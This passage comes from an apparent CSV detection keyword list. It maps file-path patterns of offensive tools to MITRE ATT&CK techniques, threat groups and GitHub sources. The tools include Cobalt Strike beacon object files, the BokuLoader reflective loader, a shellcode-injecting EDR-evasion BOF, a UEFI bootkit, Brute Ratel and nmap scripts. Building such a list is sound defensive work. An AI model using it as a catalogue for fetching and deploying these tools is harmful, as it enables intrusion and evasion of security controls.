T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/BOF-RegSave","1","1","N/A","10","10","171","29","2020-10-08T17:29:02Z","2020-10-07T13:46:03Z" +"*/BofRunner.cs*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - 
Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" +"*/BOFs.git*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOFs) for shells and lols","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/BOFs","1","1","N/A","10","10","104","12","2021-09-14T09:03:58Z","2021-08-27T10:04:12Z" +"*/bof-vs-template/*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - 
T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"*/bof-vs-template/*","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" 
+"*/boko.py*","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/bashexplode/boko","1","1","N/A","N/A","1","59","12","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z" +"*/boku7/spawn*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/spawn","1","1","N/A","10","10","408","71","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z" +"*/boku7/whereami/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses 
handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/whereami","1","1","N/A","10","10","152","27","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z" +"*/BokuLoader.c*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*/BokuLoader.h*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*/BokuLoader/*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*/BooExecutor.cs*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*/bootkit-rs*","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","449","54","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" +"*/bq1iFEP2/assert/dll/*","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","664","132","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" 
+"*/bq1iFEP2/assert/exe/*","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","664","132","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" +"*/BRC4_rar","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*/breg.x64.o*","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ausecwa/bof-registry","1","1","N/A","10","10","17","7","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z" +"*/breg.x86.o*","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - 
Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ausecwa/bof-registry","1","1","N/A","10","10","17","7","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z" +"*/broadcast-ataoe-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-avahi-dos.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-bjnp-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-db2-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-dhcp6-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-dhcp-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-dns-service-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-dropbox-listener.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-eigrp-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-hid-discoveryd.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-igmp-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-jenkins-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-listener.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-ms-sql-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-netbios-master-browser.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-networker-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
